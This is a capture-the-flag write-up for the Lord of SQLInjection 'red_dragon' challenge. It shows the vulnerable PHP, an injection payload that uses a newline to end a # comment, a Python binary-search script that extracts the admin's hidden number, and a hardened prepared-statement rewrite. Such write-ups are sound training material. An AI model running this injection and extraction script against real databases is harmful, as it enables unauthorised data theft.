
[ LOS ] Lord of SQLInjection challenge 26 writeup (red_dragon)
sangjuns
2022. 1. 14. 00:03
Challenge source
query : select id from prob_red_dragon where id='' and no=1
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\./i', $_GET['id'])) exit("No Hack ~_~");
if(strlen($_GET['id']) > 7) exit("too long string");
$no = is_numeric($_GET['no']) ? $_GET['no'] : 1;
$query = "select id from prob_red_dragon where id='{$_GET['id']}' and no={$no}";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) echo "<h2>Hello {$result['id']}</h2>";
$query = "select no from prob_red_dragon where id='admin'"; // if you think challenge got wrong, look column name again.
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['no'] === $_GET['no']) solve("red_dragon");
highlight_file(__FILE__);
?>
Analysis and payload
1. ?id='||no# comments out the rest of the query line, and no=%0a (a newline) breaks out of the # comment: is_numeric() accepts a numeric string with leading whitespace, so a newline followed by digits passes the check and is spliced into the query unquoted.
2. ?id='||no<#&no=%0a100000 therefore means no<100000.
Binary search on this condition is used to find no.
Web is so nice because it can be solved without pwntools..
Windows beats Linux after all..
import requests

URL = "https://los.rubiya.kr/chall/red_dragon_b787de2bfe6bc3454e2391c4e7bb5de8.php"
cookies = {"PHPSESSID": "kmo07vm0qujgagfi56vspjh5f8"}  # your own logged-in session

# Search range for admin's no; invariant: start <= no <= end.
start = 0
end = 0xffffffff
while start < end:
    # Round up so that mid > start; with (start+end)//2 the probe "no<start"
    # is always false once end == start + 1 and the loop never narrows.
    mid = (start + end + 1) // 2
    # id='||no<#  and  no=\n<mid>  ->  effective query: ... where id='' || no<<mid>
    query = f"?id=%27||no<%23&no=%0a{mid}"  # just using length(pw) gives odd results because guest's pw is length 4
    response = requests.get(URL + query, cookies=cookies)
    if "Hello admin" in response.text:
        end = mid - 1   # no < mid
    else:
        start = mid     # no >= mid
print(start)
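For comparison, here is a hardened rewrite of the challenge's PHP. This is an added example, not the LOS site's own code; it assumes config.php still provides login_chk(), dbconnect() (returning a mysqli connection with mysqlnd, for get_result()) and solve(). The point is that `no` is validated into a real integer rather than a string with a leading newline, and both values are bound to a prepared statement, so the `#` comment trick has nothing to terminate.

```php
<?php
// Added example: hardened rewrite of the red_dragon source above.
// Assumes config.php provides login_chk(), dbconnect() (a mysqli
// connection) and solve(), as in the original challenge; not LOS code.
include "./config.php";
login_chk();
$db = dbconnect();

// Original check: is_numeric($_GET['no']) accepts a leading newline
// ("\n100" is a numeric string), and that raw string is then spliced
// into the SQL text, where the newline ends a "#" comment.
// FILTER_VALIDATE_INT returns an int (or false), so what reaches the
// query is an integer, never the caller's string.
$no = filter_var($_GET['no'] ?? null, FILTER_VALIDATE_INT);
$query_no = ($no === false) ? 1 : $no;   // keep the challenge's default of 1

$id = $_GET['id'] ?? '';
if (strlen($id) > 7) exit("too long string");

// Bind parameters instead of interpolating: id as a string ("s"), no as
// an int ("i"). The query structure is fixed before any input is attached,
// so the prob|_|. blocklist and the quoting are no longer load-bearing.
$stmt = $db->prepare("select id from prob_red_dragon where id=? and no=?");
$stmt->bind_param("si", $id, $query_no);
$stmt->execute();
$row = $stmt->get_result()->fetch_assoc();
$stmt->close();
if ($row && $row['id'] !== '') {
    echo "<h2>Hello " . htmlspecialchars($row['id'], ENT_QUOTES, 'UTF-8') . "</h2>";
}

// The admin lookup takes no user input, but compare integer to integer,
// and only when a valid "no" was actually supplied.
$stmt = $db->prepare("select no from prob_red_dragon where id='admin'");
$stmt->execute();
$admin = $stmt->get_result()->fetch_assoc();
$stmt->close();
if ($no !== false && $admin && (int)$admin['no'] === $no) solve("red_dragon");
?>
```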